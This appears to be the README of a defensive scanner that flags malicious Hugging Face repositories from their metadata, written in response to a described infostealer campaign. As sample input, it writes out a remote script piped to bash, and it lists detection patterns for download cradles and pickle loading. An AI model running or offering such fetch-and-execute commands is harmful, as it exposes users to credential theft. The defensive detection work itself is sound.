# hf-model-provenance-scanner
[](https://github.com/poojakira/hf-model-provenance-scanner/actions/workflows/ci.yml) [](https://www.python.org/) [](LICENSE) [](https://github.com/poojakira/hf-model-provenance-scanner/releases)
> **Scan any Hugging Face repository for malicious signals _before_ the model is ever loaded.**
> Zero runtime dependencies. Stdlib only. Works offline.
---
## The Attack That Prompted This Tool
**May 14, 2026, 06:00 UTC.** A repository called `Open-OSS/privacy-filter` appeared on Hugging Face. By midnight it had reached **#1 trending** with **244,000 downloads in 18 hours**.
The attack chain was three stages:
```
loader.py → PowerShell download cradle → Rust infostealer
```
1. The README told users to run `python loader.py`.
2. `loader.py` fetched a PowerShell script from a CDN.
3. The PowerShell script compiled and executed a Rust binary that exfiltrated SSH keys, AWS credentials, and browser cookies.
The repo was removed at 00:18 UTC the next day. By then it was too late for 244,000 pull operations.
**No existing tool would have caught this before a download.**
- **Garak** tests a loaded model's outputs, which is useless if you never wanted to load it.
- **ModelScan** detects pickle exploits _inside_ weight files; it can't flag `loader.py` or a missing SBOM.
- **Vigil / Rebuff** protect LLM _inputs_ at runtime, a completely different threat surface.
`hf-model-provenance-scanner` runs _before_ any file is downloaded and detects the metadata and structural signals of this class of attack.
---
## Quick Start
### As a library
```python
from hf_scanner.scanner import scan

# Populate from your own HF API call, a CI pipeline, or manual review.
repo_metadata = {
    "repo_id": "Open-OSS/privacy-filter",
    "author": "Open-OSS",
    "files": ["loader.py", "config.json", "README.md"],
    "readme": "Run: curl https://release.open-oss.io/setup.sh | bash",
    "downloads_24h": 244_000,
    "created_at": "2026-05-14T00:00:00Z",
    "author_repo_count": 0,
    "likes": 12,
}

result = scan(repo_metadata)
print(result.risk_level)      # 'CRITICAL'
print(result.recommendation)  # 'BLOCK'
print(result.risk_score)      # e.g. 95

for finding in result.findings:
    print(f"[{finding.severity}] {finding.title}")
```
### As a CLI
```bash
pip install hf-model-provenance-scanner

# From a JSON metadata file
hf-scan --meta repo_meta.json

# Pipe JSON from stdin
echo '{"repo_id":"Open-OSS/privacy-filter","author":"Open-OSS","files":["loader.py"],"downloads_24h":244000,"author_repo_count":0}' \
  | hf-scan

# Machine-readable JSON output
hf-scan --meta repo_meta.json --format json

# Exit codes: 0 = ALLOW, 1 = REVIEW, 3 = BLOCK
```
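The exit codes make the CLI usable as a gate in a pipeline. A minimal sketch, assuming the mapping in the comment above is accurate; the function names are hypothetical, and treating any unlisted exit code as BLOCK is a fail-closed choice made for this example, not documented behaviour.

```python
import subprocess

# Mapping copied from the exit-code comment in the CLI examples.
EXIT_CODE_TO_RECOMMENDATION = {0: "ALLOW", 1: "REVIEW", 3: "BLOCK"}


def recommendation_from_exit_code(code: int) -> str:
    """Translate an hf-scan exit code; unknown codes fail closed as BLOCK."""
    return EXIT_CODE_TO_RECOMMENDATION.get(code, "BLOCK")


def gate(meta_path: str) -> str:
    """Run hf-scan on a metadata file and return its recommendation.

    Raises FileNotFoundError if hf-scan is not installed on PATH.
    """
    completed = subprocess.run(["hf-scan", "--meta", meta_path], check=False)
    return recommendation_from_exit_code(completed.returncode)
```

A CI job could call `gate("repo_meta.json")` and refuse to continue unless the result is `"ALLOW"`.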
---
## Sample Terminal Output
```
════════════════════════════════════════════════════════════
  HF Model Provenance Scanner
════════════════════════════════════════════════════════════
  Repo   : Open-OSS/privacy-filter
  Scanned: 2026-05-14T06:32:11+00:00

  Risk Score : [████████████████████████████████████░░░░] 89/100
  Risk Level : CRITICAL

  ╔══════════════════════════════════════╗
  ║  🚫  BLOCK - DO NOT LOAD THIS MODEL  ║
  ╚══════════════════════════════════════╝

  Findings (7 total):
  ────────────────────────────────────────────────────────
  1. [CRITICAL ] Known malicious loader script: 'loader.py'
     Check   : code_execution
     Desc    : The file 'loader.py' has a name associated with malware
               delivery loaders. The May 2026 attack used this filename.
     Evidence: file='loader.py'

  2. [CRITICAL ] curl-pipe-to-shell pattern detected
     Check   : code_execution
     Desc    : The README/model card contains an instruction that would
               execute remote code on the user's machine.
     Evidence: snippet='curl https://release.open-oss.io/setup.sh | bash'

  3. [HIGH     ] Suspicious download velocity: 244,000 in 24 h
     Check   : metadata_trust
     Desc    : The repo received 244,000 downloads in its first 24 hours.
     Evidence: downloads_24h=244000, threshold=10000

  4. [HIGH     ] Very new repository: 0.3 days old
     Check   : metadata_trust
     Desc    : Repos younger than 7 days have no track record.
     Evidence: created_at='2026-05-14T00:00:00Z', age_days=0.3

  5. [MEDIUM   ] Author 'Open-OSS' has no other public repositories
     Check   : metadata_trust
     Evidence: author='Open-OSS', author_repo_count=0

  6. [MEDIUM   ] No trust artifacts (model card, SBOM, provenance)
     Check   : sbom_check
     Evidence: model_card=False, sbom=False, provenance=False

  7. [MEDIUM   ] Repository has no model weights but contains scripts
     Check   : pickle_exploit
     Evidence: script_files=['loader.py']
════════════════════════════════════════════════════════════
```
---
## Checks Reference
### 1. `org_impersonation`: Brand impersonation detection
| What it detects | Why it matters |
|---|---|
| Author username within edit-distance ≤ 2 of a known-safe org | `0penai`, `micros0ft`, `meta_llama` fool humans at a glance |
| Verbatim boilerplate from a real org's model card | Attacker copies real marketing text to appear legitimate |
**Known-safe orgs:** `openai`, `meta-llama`, `google`, `microsoft`, `anthropic`, `mistralai`, `huggingface`, `stability-ai`, `cohere`, and more.
**Severity:** CRITICAL for any match.
---
### 2. `pickle_exploit`: Unsafe serialisation detection
| What it detects | Why it matters |
|---|---|
| `.pkl`, `.pt`, `.bin`, `.pth` files without `.safetensors` alternative | `torch.load()` on a pickle file = arbitrary code execution |
| `pickle.load()` / `torch.load()` / `np.load(allow_pickle=True)` in README | Instructs users to use the dangerous path |
| No model weights but scripts present | Delivery mechanism, not a real model |
**Severity:** HIGH for pickle-without-safetensors; INFO if safetensors is also present.
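The file-list part of this check needs only filename suffixes. A minimal sketch, assuming the severities stated above; the function name, the list of script suffixes, and the MEDIUM severity for the script-only case (taken from the sample terminal output) are assumptions rather than confirmed internals.

```python
from pathlib import PurePosixPath

PICKLE_SUFFIXES = {".pkl", ".pt", ".bin", ".pth"}
# Assumed set of suffixes that count as "scripts" for the no-weights rule.
SCRIPT_SUFFIXES = {".py", ".sh", ".ps1", ".bat", ".cmd"}


def pickle_findings(files: list[str]) -> list[tuple[str, str]]:
    """Return (severity, title) pairs derived from the file list alone."""
    suffixes = [PurePosixPath(name).suffix.lower() for name in files]
    has_pickle = any(s in PICKLE_SUFFIXES for s in suffixes)
    has_safetensors = ".safetensors" in suffixes
    has_scripts = any(s in SCRIPT_SUFFIXES for s in suffixes)

    findings: list[tuple[str, str]] = []
    if has_pickle:
        # A safetensors alternative downgrades the finding to INFO.
        severity = "INFO" if has_safetensors else "HIGH"
        findings.append((severity, "Pickle-format weights present"))
    if not has_pickle and not has_safetensors and has_scripts:
        findings.append(("MEDIUM", "No model weights but scripts present"))
    return findings


print(pickle_findings(["loader.py", "config.json", "README.md"]))
```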
---
### 3. `code_execution`: Executable script detection
| File / pattern | Severity |
|---|---|
| `loader.py`, `downloader.py`, `dropper.py`, `stager.py` | CRITICAL |
| `*.ps1`, `*.bat`, `*.cmd`, `*.vbs` | CRITICAL |
| `curl … \| bash`, `wget … \| sh` in README | CRITICAL |
| `IEX`, `Invoke-Expression`, `DownloadString` in README | CRITICAL |
| `install.sh`, `run.sh`, `*.exe`, `*.elf` | HIGH |
| `subprocess.run()`, `os.system()` in README | HIGH |
| `setup.py`, `Makefile` | MEDIUM |
---
### 4. `metadata_trust`: Account and velocity signals
| Signal | Threshold | Severity |
|---|---|---|
| Repo age | < 7 days | HIGH |
| Download velocity | > 10,000 in 24 h | HIGH |
| Author repo count | 0 other repos | MEDIUM |
| Like/download ratio | > 50 (purchased likes) | LOW |
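The age and velocity signals reduce to simple comparisons. A minimal sketch using the thresholds quoted in the sample terminal output (7 days, 10,000 downloads); the function name is hypothetical, the like/download ratio is left out, and missing keys are simply skipped here, which is a simplification rather than the worst-case handling the scanner describes.

```python
from datetime import datetime, timezone

MAX_NEW_REPO_AGE_DAYS = 7
MAX_DOWNLOADS_24H = 10_000


def metadata_trust_findings(meta: dict, now: datetime) -> list[tuple[str, str]]:
    """Return (severity, title) pairs for age, velocity, and author signals."""
    findings: list[tuple[str, str]] = []

    created_at = meta.get("created_at")
    if created_at:
        # Normalise a trailing "Z" for Python versions that reject it.
        created = datetime.fromisoformat(created_at.replace("Z", "+00:00"))
        age_days = (now - created).total_seconds() / 86_400
        if age_days < MAX_NEW_REPO_AGE_DAYS:
            findings.append(("HIGH", f"Very new repository: {age_days:.1f} days old"))

    downloads = meta.get("downloads_24h", 0)
    if downloads > MAX_DOWNLOADS_24H:
        findings.append(("HIGH", f"Suspicious download velocity: {downloads:,} in 24 h"))

    if meta.get("author_repo_count") == 0:
        author = meta.get("author", "unknown")
        findings.append(("MEDIUM", f"Author '{author}' has no other public repositories"))
    return findings


scan_time = datetime(2026, 5, 14, 6, 32, 11, tzinfo=timezone.utc)
sample = {
    "author": "Open-OSS",
    "created_at": "2026-05-14T00:00:00Z",
    "downloads_24h": 244_000,
    "author_repo_count": 0,
}
for severity, title in metadata_trust_findings(sample, scan_time):
    print(f"[{severity}] {title}")
```

Passing `now` explicitly keeps the function deterministic, which makes the age threshold straightforward to test.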
---
### 5. `sbom_check`: Provenance artifact checks
| Artifact | Severity if missing |
|---|---|
| Model card (`README.md` with `model-index` YAML) | LOW |
| SBOM (`sbom.json`, `sbom.spdx`, `cyclonedx.json`) | INFO |
| Provenance (`provenance.json`, `attestation.json`) | INFO |
| All three missing together | MEDIUM (escalated) |
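The escalation rule in the last row can be sketched as follows. This assumes that when all three artifacts are missing the scanner reports one MEDIUM finding instead of three separate ones, which matches the single finding in the sample output but is not confirmed; the function name and the plain substring test for `model-index` are likewise simplifications.

```python
SBOM_FILES = {"sbom.json", "sbom.spdx", "cyclonedx.json"}
PROVENANCE_FILES = {"provenance.json", "attestation.json"}


def trust_artifact_findings(files: list[str], readme: str) -> list[tuple[str, str]]:
    """Return (severity, title) pairs for missing trust artifacts."""
    names = {name.rsplit("/", 1)[-1].lower() for name in files}
    has_card = "readme.md" in names and "model-index" in readme
    has_sbom = bool(names & SBOM_FILES)
    has_provenance = bool(names & PROVENANCE_FILES)

    if not (has_card or has_sbom or has_provenance):
        # Escalation: nothing at all vouches for this repository.
        return [("MEDIUM", "No trust artifacts (model card, SBOM, provenance)")]

    findings: list[tuple[str, str]] = []
    if not has_card:
        findings.append(("LOW", "No model card"))
    if not has_sbom:
        findings.append(("INFO", "No SBOM"))
    if not has_provenance:
        findings.append(("INFO", "No provenance attestation"))
    return findings


print(trust_artifact_findings(["loader.py", "config.json", "README.md"], "Run: ..."))
```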
---
### 6. `supply_chain`: Dependency analysis
| Pattern | Severity |
|---|---|
| `--index-url` pointing away from PyPI | HIGH |
| Direct wheel/tarball URL installs | HIGH |
| Known typo-squatted package names | HIGH |
| `git+https://` dependencies | MEDIUM |
| `--extra-index-url` non-PyPI | MEDIUM |
| > 3 unpinned dependencies | LOW |
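Most of these patterns can be found with a line-by-line pass over the raw `requirements` text. The sketch below is an approximation under stated assumptions: the function name, the PyPI URL prefixes, and the regexes are invented for this example, "unpinned" is taken to mean "no `==`", and the typo-squatting check is omitted because it needs a curated name list.

```python
import re

PYPI_PREFIXES = ("https://pypi.org/", "https://pypi.python.org/")
INDEX_OPTION = re.compile(r"(--index-url|-i|--extra-index-url)[=\s]+(\S+)")
ARCHIVE_URL = re.compile(r"https?://\S+\.(?:whl|tar\.gz|tgz)\b")


def supply_chain_findings(requirements: str) -> list[tuple[str, str]]:
    """Return (severity, title) pairs for risky requirements.txt lines."""
    findings: list[tuple[str, str]] = []
    unpinned = 0
    for raw in requirements.splitlines():
        line = re.sub(r"\s+#.*$", "", raw).strip()  # drop inline comments
        if not line or line.startswith("#"):
            continue
        option = INDEX_OPTION.match(line)
        if option:
            flag, url = option.groups()
            if not url.startswith(PYPI_PREFIXES):
                severity = "MEDIUM" if flag == "--extra-index-url" else "HIGH"
                findings.append((severity, f"{flag} points away from PyPI: {url}"))
            continue
        if line.startswith("-"):
            continue  # other pip options are ignored in this sketch
        if "git+https://" in line:
            findings.append(("MEDIUM", f"git dependency: {line}"))
        elif ARCHIVE_URL.search(line):
            findings.append(("HIGH", f"direct archive install: {line}"))
        elif "==" not in line:
            unpinned += 1
    if unpinned > 3:
        findings.append(("LOW", f"{unpinned} unpinned dependencies"))
    return findings


sample_requirements = """\
--index-url https://packages.example.net/simple
torch
numpy
requests
tqdm
pillow==10.0.0
git+https://github.com/example/pkg.git
https://files.example.net/pkg-1.0-py3-none-any.whl
"""
for severity, title in supply_chain_findings(sample_requirements):
    print(f"[{severity}] {title}")
```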
---
## Risk Scoring Formula
The 0–100 risk score uses **diminishing returns**: each additional finding of the same severity contributes less than the one before it. A single CRITICAL finding does not max out the score, but two or more CRITICAL findings do.
```
score = min(100, Σ severity_weight(i) × 1 / (1 + 0.15 × same_severity_count(i)))
```
Severity weights:
| Severity | Base weight |
|---|---|
| CRITICAL | 55 |
| HIGH | 35 |
| MEDIUM | 18 |
| LOW | 8 |
| INFO | 2 |
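The formula and weights can be worked through in a few lines. This sketch assumes `same_severity_count(i)` means the number of earlier findings with the same severity (so the first finding of each severity counts at full weight) and that the total is rounded to an integer; both are interpretations chosen to match the one-versus-two CRITICAL behaviour described above, not confirmed details.

```python
SEVERITY_WEIGHTS = {"CRITICAL": 55, "HIGH": 35, "MEDIUM": 18, "LOW": 8, "INFO": 2}


def risk_score(severities: list[str]) -> int:
    """Sum severity weights with diminishing returns, capped at 100."""
    seen = dict.fromkeys(SEVERITY_WEIGHTS, 0)
    total = 0.0
    for severity in severities:
        # Each repeat of a severity is divided by a growing factor.
        total += SEVERITY_WEIGHTS[severity] / (1 + 0.15 * seen[severity])
        seen[severity] += 1
    return min(100, round(total))


print(risk_score(["CRITICAL"]))              # 55: one CRITICAL stays below the cap
print(risk_score(["CRITICAL", "CRITICAL"]))  # 100: 55 + 55/1.15 exceeds the cap
print(risk_score(["HIGH", "MEDIUM"]))        # 53: different severities do not decay
```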
Score → risk level → recommendation:
| Score | Risk Level | Recommendation |
|---|---|---|
| 0 | SAFE | ALLOW |
| 1–15 | LOW | ALLOW |
| 16–35 | MEDIUM | REVIEW |
| 36–60 | HIGH | REVIEW |
| 61–100 | CRITICAL | BLOCK |
**Hard override:** Any CRITICAL-severity finding forces `recommendation = BLOCK`, regardless of score.
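The score bands and the hard override combine as in this short sketch. The function name `classify` is hypothetical; the bands and the override rule are taken directly from the table and sentence above.

```python
def classify(score: int, severities: list[str]) -> tuple[str, str]:
    """Map a 0-100 score to (risk_level, recommendation)."""
    if score == 0:
        level, recommendation = "SAFE", "ALLOW"
    elif score <= 15:
        level, recommendation = "LOW", "ALLOW"
    elif score <= 35:
        level, recommendation = "MEDIUM", "REVIEW"
    elif score <= 60:
        level, recommendation = "HIGH", "REVIEW"
    else:
        level, recommendation = "CRITICAL", "BLOCK"

    # Hard override: any CRITICAL finding blocks, whatever the score band.
    if "CRITICAL" in severities:
        recommendation = "BLOCK"
    return level, recommendation


print(classify(55, ["CRITICAL"]))        # ('HIGH', 'BLOCK')
print(classify(53, ["HIGH", "MEDIUM"]))  # ('HIGH', 'REVIEW')
```

The first call shows why the override matters: a lone CRITICAL finding scores 55, which falls in the REVIEW band on score alone.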
---
## `repo_metadata` Schema
```python
{
    # Required
    "repo_id": str,               # "author/model-name"

    # Strongly recommended
    "author": str,                # HF username or org slug
    "files": list[str],           # filenames in the repo root
    "readme": str,                # raw README.md content
    "created_at": str,            # ISO-8601 UTC "2026-05-14T00:00:00Z"
    "author_repo_count": int,     # how many repos the author has
    "downloads_24h": int,         # downloads in first 24 hours
    "downloads_last_month": int,
    "likes": int,

    # Optional
    "requirements": str,          # raw requirements.txt content
    "tags": list[str],
    "last_modified": str,         # ISO-8601 UTC
}
```
All keys other than `repo_id` are optional. Missing keys are treated conservatively: trust signals assume the worst case.
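Because the input is a plain dict, a small type check before scanning can catch malformed payloads early. This is a hypothetical pre-flight helper, not part of the package: `schema_problems` and its message format are invented for this sketch, and flagging unknown keys is a choice made here rather than documented scanner behaviour.

```python
SCHEMA: dict[str, type] = {
    "repo_id": str, "author": str, "files": list, "readme": str,
    "created_at": str, "author_repo_count": int, "downloads_24h": int,
    "downloads_last_month": int, "likes": int, "requirements": str,
    "tags": list, "last_modified": str,
}


def schema_problems(meta: dict) -> list[str]:
    """Return human-readable problems; an empty list means the dict looks valid."""
    problems: list[str] = []
    for key, value in meta.items():
        expected = SCHEMA.get(key)
        if expected is None:
            problems.append(f"unknown key: {key}")
        # bool is a subclass of int, so reject it explicitly.
        elif isinstance(value, bool) or not isinstance(value, expected):
            problems.append(
                f"{key}: expected {expected.__name__}, got {type(value).__name__}"
            )
        elif expected is list and not all(isinstance(item, str) for item in value):
            problems.append(f"{key}: expected list of str")
    return problems


print(schema_problems({"repo_id": "Open-OSS/privacy-filter", "likes": "12"}))
```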
---
## What No Other Tool Does
| Tool | What it does | What it misses |
|---|---|---|
| **Garak** | Red-teams a *loaded* model's output safety | Can't run before you download |
| **ModelScan** | Scans pickle bytecode inside weight files | Requires the file to be present; misses loader.py, missing SBOM |
| **Vigil / Rebuff** | Detects prompt injection at *runtime* | Completely different threat surface |
| **PurpleLlama** | Model output safety benchmarks | Post-load evaluation only |
| **Agentic Radar** | Scans agentic workflow code | Not focused on model provenance |
| **hf-model-provenance-scanner** | **Pre-download supply-chain audit** | _This is the gap_ |
The core insight: **the May 2026 attack was detectable from metadata alone**, without downloading a single byte. `loader.py` + 244K downloads in 24h + zero-repo account + no model card = BLOCK. No existing tool made this call.
---
## Installation
```bash
# From PyPI (once published)
pip install hf-model-provenance-scanner

# From source
git clone https://github.com/poojakira/hf-model-provenance-scanner
cd hf-model-provenance-scanner
pip install -e ".[dev]"
```
**Requirements:** Python ≥ 3.11. Zero runtime dependencies.
---
## Development
```bash
# Run tests
python -m pytest tests/ -v

# Lint
ruff check src/ tests/

# Run the CLI against a sample payload
echo '{"repo_id":"Open-OSS/privacy-filter","author":"Open-OSS","files":["loader.py"],"downloads_24h":244000,"author_repo_count":0,"created_at":"2026-05-14T00:00:00Z"}' \
  | python -m hf_scanner.scanner
```
---
## License
MIT. See [LICENSE](LICENSE).
---
## Contributing
Pull requests welcome. Please add tests for any new check.
Read [CONTRIBUTING.md](CONTRIBUTING.md) before opening a PR.